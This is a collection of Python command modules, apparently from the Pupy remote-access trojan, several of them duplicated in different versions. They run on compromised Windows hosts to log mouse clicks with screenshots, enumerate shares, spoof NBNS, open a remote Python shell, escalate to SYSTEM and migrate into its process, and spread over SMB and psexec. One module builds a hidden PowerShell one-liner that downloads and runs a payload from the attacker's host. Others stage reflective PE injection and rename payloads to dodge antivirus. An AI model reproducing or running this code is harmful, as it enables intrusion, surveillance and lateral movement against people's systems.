def run(self, args):
try:
os.makedirs(os.path.join("data","mouselogger"))
except Exception:
pass
if args.action=="start":
if self.mouselogger:
self.error("the mouselogger is already started")
else:
self.mouselogger=self.client.conn.modules["pupwinutils.mouselogger"].get_mouselogger()
if not self.mouselogger.is_alive():
with redirected_stdo(self):
self.mouselogger.start()
self.success("mouselogger started")
else:
self.success("previously started mouselogger session retrieved")
else:
if not self.mouselogger:
self.error("the mouselogger is not running")
return
if args.action=="dump":
self.success("dumping recorded mouse clicks :")
screenshots_list=obtain(self.mouselogger.retrieve_screenshots())
self.success("%s screenshots taken"%len(screenshots_list))
for d, height, width, exe, win_title, buf in screenshots_list:
try:
filepath=os.path.join("data","mouselogger","scr_"+self.client.short_name()+"_"+win_title.decode("utf8",errors="ignore").replace(" ","_").replace("\\","").replace("/","")+"_"+d.replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, base64.b64decode(buf), width, height)
self.info("screenshot saved to %s"%filepath)
except Exception as e:
self.error("Error saving a screenshot: %s"%str(e))
elif args.action=="stop":
self.mouselogger.stop()
self.job.stop()
def run(self, args):
# Retrieve local shared folders
try:
if args.local:
if self.client.is_windows():
self.client.load_package("win32api")
self.client.load_package("win32com")
self.client.load_package("pythoncom")
self.client.load_package("winerror")
self.client.load_package("wmi")
self.client.load_package("pupwinutils.drives")
with redirected_stdo(self.client.conn):
self.client.conn.modules[
'pupwinutils.drives'].shared_folders()
else:
self.warning(
'this module works only for windows. Try using: run shares remote -t 127.0.0.1'
)
return
except:
pass
# Retrieve remote shared folders
if not args.target:
self.error("target (-t) parameter must be specify")
return
if "/" in args.target:
hosts = IPNetwork(args.target)
else:
hosts = list()
hosts.append(args.target)
print hosts
self.client.load_package("impacket")
self.client.load_package("calendar")
self.client.load_package("pupyutils.share_enum")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.share_enum"].connect(
host, args.port, args.user, args.passwd, args.hash,
args.domain)
def run(self, args):
init_winpcap(self.client)
# Load full scapy
self.client.load_package('scapy', honor_ignore=False, force=True)
with redirected_stdo(self):
self.client.conn.modules['nbnsspoof'].start_nbnsspoof(
args.ip,
args.srcmac,
timeout=args.timeout,
verbose=True,
interface=args.iface,
name_regexp=args.regex)
def run(self, args):
try:
with redirected_stdo(self.client.conn):
old_completer=readline.get_completer()
try:
psc=self.client.conn.modules['pyshell.controller'].PyShellController()
readline.set_completer(psc.get_completer())
readline.parse_and_bind('tab: complete')
while True:
cmd=raw_input(">>> ")
psc.write(cmd)
finally:
readline.set_completer(old_completer)
readline.parse_and_bind('tab: complete')
except KeyboardInterrupt:
pass
def run(self, args):
try:
with redirected_stdo(self):
old_completer=readline.get_completer()
try:
psc=self.client.conn.modules['pyshell.controller'].PyShellController()
readline.set_completer(psc.get_completer())
readline.parse_and_bind('tab: complete')
while True:
cmd=raw_input(">>> ")
psc.write(cmd)
finally:
readline.set_completer(old_completer)
readline.parse_and_bind('tab: complete')
except KeyboardInterrupt:
pass
def run(self, args):
try:
os.makedirs(os.path.join("data", "mouselogger"))
except Exception:
pass
if args.action == "start":
self.client.load_package("pupwinutils.mouselogger")
if self.mouselogger:
self.error("the mouselogger is already started")
else:
self.mouselogger = self.client.conn.modules[
"pupwinutils.mouselogger"].get_mouselogger()
if not self.mouselogger.is_alive():
with redirected_stdo(self.client.conn):
self.mouselogger.start()
self.success("mouselogger started")
else:
self.success(
"previously started mouselogger session retrieved")
else:
if not self.mouselogger:
self.error("the mouselogger is not running")
return
if args.action == "dump":
self.success("dumping recorded mouse clicks :")
screenshots_list = obtain(
self.mouselogger.retrieve_screenshots())
self.success("%s screenshots taken" % len(screenshots_list))
for d, height, width, exe, win_title, buf in screenshots_list:
try:
filepath = os.path.join(
"data", "mouselogger",
"scr_" + self.client.short_name() + "_" +
win_title.decode("utf8", errors="ignore").replace(
" ", "_").replace("\\", "").replace("/", "") +
"_" + d.replace(" ", "_").replace(":", "-") +
".jpg")
pil_save(filepath, base64.b64decode(buf), width,
height)
self.info("screenshot saved to %s" % filepath)
except Exception as e:
self.error("Error saving a screenshot: %s" % str(e))
elif args.action == "stop":
self.mouselogger.stop()
self.job.stop()
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
src = ''
dst = ''
random_pupy_name = ''
# if args.execute_pupy:
# random_pupy_name = ''.join(random.sample(string.ascii_letters, 10)) + '.txt'
# res=self.client.conn.modules['pupy'].get_connect_back_host()
# h, p = res.rsplit(':',1)
# self.info("Address configured is %s:%s for pupy dll..."%(h,p))
# self.info("Creating localy a Pupy dll")
# pupygen.create_ps1_file(self.client.get_conf(), random_pupy_name, tempfile.gettempdir(), "x86")
# pupyDLLLocalPath = os.path.join(tempfile.gettempdir(),random_pupy_name)
# print pupyDLLLocalPath
# return
# # upload the binary to the current session
# # remoteTempFolder=self.client.conn.modules['os.path'].expandvars("%TEMP%") # Do a remote path for linux machine
# remoteTempFolder=self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%") # Do a remote path for linux machine
# # remoteTempFolder="C:\\Temp\\" # Do a remote path for linux machine
# pupyDLLRemotePath = "{0}".format(self.client.conn.modules['os.path'].join(remoteTempFolder, random_pupy_name))
# self.info("Uploading pupy dll in {0}".format(pupyDLLRemotePath))
# upload(self.client.conn, pupyDLLLocalPath, pupyDLLRemotePath)
# self.info("File uploaded")
# src = pupyDLLRemotePath
# dst = '%s\\Temp\\%s' % (args.share, random_pupy_name)
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package("calendar")
self.client.load_package("pupyutils.smbmap")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.smbmap"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, args.list_shares, args.execute_pupy, random_pupy_name, src, dst, args.command, args.domain, args.execm)
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
src = ''
dst = ''
exe_name = ''
if args.file:
if not os.path.exists(args.file):
self.error('File not found: %s' % args.file)
return
if not args.file.endswith('.exe'):
self.error('Only executable files could be uploaded')
return
exe_name = ''.join(random.sample(string.ascii_letters, 10)) + '.exe'
if self.client.is_windows():
remote_path = '%s\\%s' % (self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%"), exe_name) # Do a remote path for linux machine
else:
remote_path = '/tmp/%s' % exe_name
self.info("Uploading file to {0}".format(remote_path))
upload(self.client.conn, args.file, remote_path)
self.info("File uploaded")
# once uploaded, this file has to be uploaded to the windows share
src = remote_path
dst = '%s\\%s' % (args.share.replace('$', ':'), exe_name)
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package("calendar")
self.client.load_package("pupyutils.smbexec")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.smbexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, args.file, exe_name, src, dst, args.command, args.domain, args.execm)
def run(self, args):
init_winpcap(self.client)
self.client.load_package('scapy', honor_ignore=False, force=True)
try:
with redirected_stdo(self):
old_completer = readline.get_completer()
try:
psc=self.client.conn.modules['pyshell.controller'].PyShellController()
readline.set_completer(psc.get_completer())
readline.parse_and_bind('tab: complete')
psc.write("from scapy.all import *")
while True:
cmd=raw_input(">>> ")
psc.write(cmd)
finally:
readline.set_completer(old_completer)
readline.parse_and_bind('tab: complete')
except KeyboardInterrupt:
pass
def run(self, args):
code=""
if args.file:
self.info("loading code from %s ..."%args.file)
with open(args.file,'r') as f:
code=f.read()
else:
code=args.code
stdout=StringIO.StringIO()
stderr=StringIO.StringIO()
try:
with redirected_stdo(self.client.conn, stdout, stderr):
self.client.conn.execute(code+"\n")
res=stdout.getvalue()
err=stderr.getvalue()
if err.strip():
err="\n"+err
self.rawlog(res+err)
finally:
stdout.close()
stderr.close()
def run(self, args):
code = ""
if args.file:
self.info("loading code from %s ..." % args.file)
with open(args.file, 'r') as f:
code = f.read()
else:
code = args.code
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
try:
with redirected_stdo(self.client.conn, stdout, stderr):
self.client.conn.execute(code + "\n")
res = stdout.getvalue()
err = stderr.getvalue()
if err.strip():
err = "\n" + err
self.rawlog(res + err)
finally:
stdout.close()
stderr.close()
def run(self, args):
PyShellController = self.client.remote('pyshell.controller',
'PyShellController', False)
try:
with redirected_stdo(self):
old_completer = readline.get_completer()
try:
psc = PyShellController()
readline.set_completer(psc.get_completer())
readline.parse_and_bind('tab: complete')
while True:
cmd = raw_input(">>> ")
psc.write(cmd)
finally:
readline.set_completer(old_completer)
readline.parse_and_bind('tab: complete')
except (EOFError, KeyboardInterrupt):
self.log('pyshell closed')
def run(self, args):
code = ""
if args.file:
self.info("loading code from %s ..." % args.file)
with open(args.file, 'r') as f:
code = f.read()
elif args.code:
code = args.code
else:
raise PupyModuleError("--code or --file argument is mandatory")
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
try:
with redirected_stdo(self.client.conn, stdout, stderr):
self.client.conn.execute(code + "\n")
finally:
res = stdout.getvalue()
err = stderr.getvalue()
if err.strip():
err = "\n" + err
self.rawlog(res + err)
stdout.close()
stderr.close()
def run(self, args):
code=""
if args.file:
self.info("loading code from %s ..."%args.file)
with open(args.file,'r') as f:
code=f.read()
elif args.code:
code=args.code
else:
raise PupyModuleError("--code or --file argument is mandatory")
stdout=StringIO.StringIO()
stderr=StringIO.StringIO()
try:
with redirected_stdo(self.client.conn, stdout, stderr):
self.client.conn.execute(code+"\n")
finally:
res=stdout.getvalue()
err=stderr.getvalue()
if err.strip():
err="\n"+err
self.rawlog(res+err)
stdout.close()
stderr.close()
def run(self, args):
with redirected_stdo(self.client.conn):
proc_pid=self.client.conn.modules["pupwinutils.security"].getsystem()
migrate(self, proc_pid)
self.success("got system !")
def run(self, args):
with redirected_stdo(self.client.conn):
proc_pid = self.client.conn.modules[
"pupwinutils.getsystem"].getsystem()
migrate(self, proc_pid)
self.success("got system !")
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
ext = ''
remote_path = ''
dst_folder = ''
file_to_upload = []
if args.file or args.ps1:
tmp_dir = tempfile.gettempdir()
if self.client.is_windows():
remote_path = '%s\\' % self.client.conn.modules['os.path'].expandvars("%ALLUSERSPROFILE%")
else:
remote_path = '/tmp/'
# write on the temp directory
if args.share == 'C$':
dst_folder = "C:\\Windows\\TEMP\\"
# write on the root directory
else:
dst_folder = '%s\\' % args.share.replace('$', ':')
# if executable to upload
if args.file:
if not os.path.exists(args.file):
self.error('File not found: %s' % args.file)
return
if not args.file.endswith('.exe'):
self.error('Only executable files could be uploaded')
return
ext = '.exe'
random_name = ''.join(random.sample(string.ascii_letters, 10)) + ext
shutil.copy(args.file, tmp_dir + os.sep + random_name)
file_to_upload = [random_name]
# if uploading powershell
else:
ext = '.txt'
first_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
second_stage = ''.join(random.sample(string.ascii_letters, 10)) + ext
file_to_upload = [first_stage, second_stage]
launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(invoke_reflective_random_name=dst_folder + second_stage)
launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
self.success('first stage created: %s' % tmp_dir + os.sep + first_stage)
command = getInvokeReflectivePEInjectionWithDLLEmbedded(self.client.get_conf())
open(tmp_dir + os.sep + second_stage, 'w').write(command)
self.success('second stage created: %s' % tmp_dir + os.sep + second_stage)
for file in file_to_upload:
src = tmp_dir + os.sep + file
dst = remote_path + file
self.info("Uploading file to {0}".format(dst))
upload(self.client.conn, src, dst)
self.success("File uploaded")
if args.ps1_oneliner:
res=self.client.conn.modules['pupy'].get_connect_back_host()
ip, port = res.rsplit(':', 1)
cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (os.getcwd(), str(args.ps1_port), ip, port)
self.warning('starting the local server')
process = Popen(cmd.split(' '), stdout=PIPE, stderr=PIPE, stdin=PIPE)
time.sleep(2)
# check if the server has been launched corretly
if process.poll():
self.error('the server has not been launched, check if the port %s or if the file %s/pupygen.py exists' % (str(args.ps1_port), os.getcwd()))
return
self.success('server started (pid: %s)' % process.pid)
args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (ip, str(args.ps1_port))
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package('ntpath')
self.client.load_package("calendar")
self.client.load_package("pupyutils.psexec")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.psexec"].connect(host, args.port, args.user, args.passwd, args.hash, args.share, file_to_upload, remote_path, dst_folder, args.command, args.domain, args.execm)
if args.ps1_oneliner:
self.warning('stopping the local server (pid: %s)' % process.pid)
process.terminate()
elif args.ps1:
self.warning('Do not forget to remove the file: %s' % dst_folder + first_stage)
self.warning('Do not forget to remove the file: %s' % dst_folder + second_stage)
def run(self, args):
if "/" in args.target[0]:
hosts = IPNetwork(args.target[0])
else:
hosts = list()
hosts.append(args.target[0])
ext = ''
remote_path = ''
dst_folder = ''
file_to_upload = []
if args.file or args.ps1:
tmp_dir = tempfile.gettempdir()
if self.client.is_windows():
remote_path = '%s\\' % self.client.conn.modules[
'os.path'].expandvars("%ALLUSERSPROFILE%")
else:
remote_path = '/tmp/'
# write on the temp directory
if args.share == 'C$':
dst_folder = "C:\\Windows\\TEMP\\"
# write on the root directory
else:
dst_folder = '%s\\' % args.share.replace('$', ':')
# if executable to upload
if args.file:
if not os.path.exists(args.file):
self.error('File not found: %s' % args.file)
return
if not args.file.endswith('.exe'):
self.error('Only executable files could be uploaded')
return
ext = '.exe'
random_name = ''.join(random.sample(string.ascii_letters,
10)) + ext
shutil.copy(args.file, tmp_dir + os.sep + random_name)
file_to_upload = [random_name]
# if uploading powershell
else:
ext = '.txt'
first_stage = ''.join(random.sample(string.ascii_letters,
10)) + ext
second_stage = ''.join(random.sample(string.ascii_letters,
10)) + ext
file_to_upload = [first_stage, second_stage]
launcher = """cat {invoke_reflective_random_name} | Out-String | IEX""".format(
invoke_reflective_random_name=dst_folder + second_stage)
launcher = create_ps_command(launcher,
force_ps32=True,
nothidden=False)
open(tmp_dir + os.sep + first_stage, 'w').write(launcher)
self.success('first stage created: %s' % tmp_dir + os.sep +
first_stage)
command = getInvokeReflectivePEInjectionWithDLLEmbedded(
self.client.get_conf())
open(tmp_dir + os.sep + second_stage, 'w').write(command)
self.success('second stage created: %s' % tmp_dir + os.sep +
second_stage)
for file in file_to_upload:
src = tmp_dir + os.sep + file
dst = remote_path + file
self.info("Uploading file to {0}".format(dst))
upload(self.client.conn, src, dst)
self.success("File uploaded")
if args.ps1_oneliner:
res = self.client.conn.modules['pupy'].get_connect_back_host()
ip, port = res.rsplit(':', 1)
cmd = '%s/pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port %s connect --host %s:%s' % (
os.getcwd(), str(args.ps1_port), ip, port)
self.warning('starting the local server')
process = Popen(cmd.split(' '),
stdout=PIPE,
stderr=PIPE,
stdin=PIPE)
time.sleep(2)
# check if the server has been launched corretly
if process.poll():
self.error(
'the server has not been launched, check if the port %s or if the file %s/pupygen.py exists'
% (str(args.ps1_port), os.getcwd()))
return
self.success('server started (pid: %s)' % process.pid)
args.command = 'powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://%s:%s/eiloShaegae1\')"' % (
ip, str(args.ps1_port))
self.info("Loading dependencies")
self.client.load_package("impacket")
self.client.load_package('ntpath')
self.client.load_package("calendar")
self.client.load_package("pupyutils.psexec")
with redirected_stdo(self.client.conn):
for host in hosts:
self.info("Connecting to the remote host: %s" % host)
self.client.conn.modules["pupyutils.psexec"].connect(
host, args.port, args.user, args.passwd, args.hash,
args.share, file_to_upload, remote_path, dst_folder,
args.command, args.domain, args.execm)
if args.ps1_oneliner:
self.warning('stopping the local server (pid: %s)' %
process.pid)
process.terminate()
elif args.ps1:
self.warning('Do not forget to remove the file: %s' %
dst_folder + first_stage)
self.warning('Do not forget to remove the file: %s' %
dst_folder + second_stage)
def run(self, args):
local_file = ''
# restart current exe as system
if args.restart:
self.info('Using current executable')
exe = self.client.desc['exec_path'].split('\\')
if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe'
] and exe[1].lower() == 'windows':
self.warning('It seems that your current process is %s' %
self.client.desc['exec_path'])
self.warning('It is not recommended to restart it')
return
cmd = self.client.desc['exec_path']
# use powerhell to get a reverse shell
elif args.powershell:
ros = self.client.conn.modules['os']
rtempfile = self.client.conn.modules['tempfile']
tempdir = rtempfile.gettempdir()
random_name = ''.join([
random.choice(string.ascii_letters + string.digits)
for n in xrange(6)
])
remotefile = ''
self.info('Using powershell payload')
if '64' in self.client.desc['os_arch']:
local_file = pupygen.generate_ps1(self.client.get_conf(),
x64=True)
else:
local_file = pupygen.generate_ps1(self.client.get_conf(),
x86=True)
# change the ps1 to txt file to avoid AV detection
random_name += '.txt'
remotefile = ros.path.join(tempdir, random_name)
cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile
cmd = '%s %s' % (cmd, param)
self.info("Uploading file in %s" % remotefile)
upload(self.client.conn, local_file, remotefile)
# migrate
else:
cmd = args.prog
with redirected_stdo(self):
proc_pid = self.client.conn.modules[
"pupwinutils.security"].getsystem(prog=cmd)
if args.migrate and not args.restart and not args.powershell:
migrate(self, proc_pid)
self.success("got system !")
else:
self.success(
"Waiting for a connection (take few seconds, 1 min max)...")
if args.powershell:
os.remove(local_file)
def run(self, args):
local_file = ''
#True if ps1 script will be used in bind mode. If reverse connection with ps1 then False
isBindLauncherForPs1 = False
#Contains ip:port used for bind connection on the target with ps1 script. None if reverse connection and (consequently) isBindLauncherForPs1==False
listeningAddressPortForBindPs1 = None
#Usefull information for bind mode connection (ps1 script)
launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
#Case of a pupy bind shell if ps1 mode is used (no reverse connection possible)
if launcherType == "bind":
self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort))
isBindLauncherForPs1 = True
self.info('Consequently, powershell option is enabled')
args.powershell = True
else:
self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)')
isBindLauncherForPs1 = False
# restart current exe as system
if args.restart:
self.info('Using current executable')
exe = self.client.desc['exec_path'].split('\\')
if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows':
self.warning('It seems that your current process is %s' % self.client.desc['exec_path'])
self.warning('It is not recommended to restart it')
return
cmd = self.client.desc['exec_path']
# use powerhell to get a reverse shell
elif args.powershell or isBindLauncherForPs1:
clientConfToUse = None
ros = self.client.conn.modules['os']
rtempfile = self.client.conn.modules['tempfile']
tempdir = rtempfile.gettempdir()
random_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(6)])
remotefile = ''
if isBindLauncherForPs1:
self.info('Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'.format(addressPort))
self.info("Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port")
self.info("Be careful, you have to choose a port which is not used on the target!")
listeningPort = -1
while listeningPort==-1:
try:
listeningPort = int(input("[?] Give me the listening port to use on the target: "))
except Exception as e:
self.warning("You have to give me a valid port. Try again. ({})".format(e))
listeningAddress = addressPort.split(':')[0]
listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort)
self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1))
bindConf = self.client.get_conf()
#Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target
bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort)
clientConfToUse = bindConf
else:
self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection')
clientConfToUse = self.client.get_conf()
if '64' in self.client.desc['proc_arch']:
local_file = pupygen.generate_ps1(clientConfToUse, x64=True)
else:
local_file = pupygen.generate_ps1(clientConfToUse, x86=True)
# change the ps1 to txt file to avoid AV detection
random_name += '.txt'
remotefile = ros.path.join(tempdir, random_name)
cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe'
param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile
cmd = '%s %s' % (cmd, param)
self.info("Uploading file in %s" % remotefile)
upload(self.client.conn, local_file, remotefile)
# migrate
else:
cmd = args.prog
with redirected_stdo(self):
proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd)
if args.migrate and not args.restart and not args.powershell:
migrate(self, proc_pid, keep=args.keep, timeout=args.timeout)
self.success("got system !")
else:
if isBindLauncherForPs1 == True:
self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1))
else:
self.success("Waiting for a connection (take few seconds, 1 min max)...")
if args.powershell:
os.remove(local_file)
